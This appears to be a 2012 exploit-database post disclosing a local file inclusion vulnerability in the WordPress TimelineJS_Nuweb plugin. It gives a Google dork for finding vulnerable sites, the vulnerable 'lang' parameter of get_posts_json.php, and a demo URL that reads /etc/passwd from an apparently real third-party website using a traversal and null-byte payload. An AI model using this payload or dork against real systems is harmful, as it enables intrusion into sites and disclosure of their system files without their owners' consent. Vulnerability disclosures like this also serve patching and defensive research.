Home / exploits WordPress TimelineJS_Nuweb Local File Inclusion
Posted on 30 November 2012
# Exploit Title: Wordpress TimelineJS_Nuweb Plugin Local File Inclusion Vulnerability # # Google Dork: inurl:/wp-content/plugins/TimelineJS_Nuweb/get_posts_json.php?lang= # # Date: 2012-29-11 # Exploit Author: Ashiyane Digital Security Team # # Discovered by : Amirh03in # # Tested on: Linux # # Security Risk : MEdium # # Category: Web Application # =================================== =================================== # Location: http://site.com/wp-content/plugins/TimelineJS_Nuweb/get_posts_json.php?lang=[Directory or file] # # Demo : http://brgstime.com/wp/wp-content/plugins/TimelineJS_Nuweb/get_posts_json.php?lang=/etc/passwd%0 # ======================================= ======================================= Greetz to: My Lord ALLAH =======================================
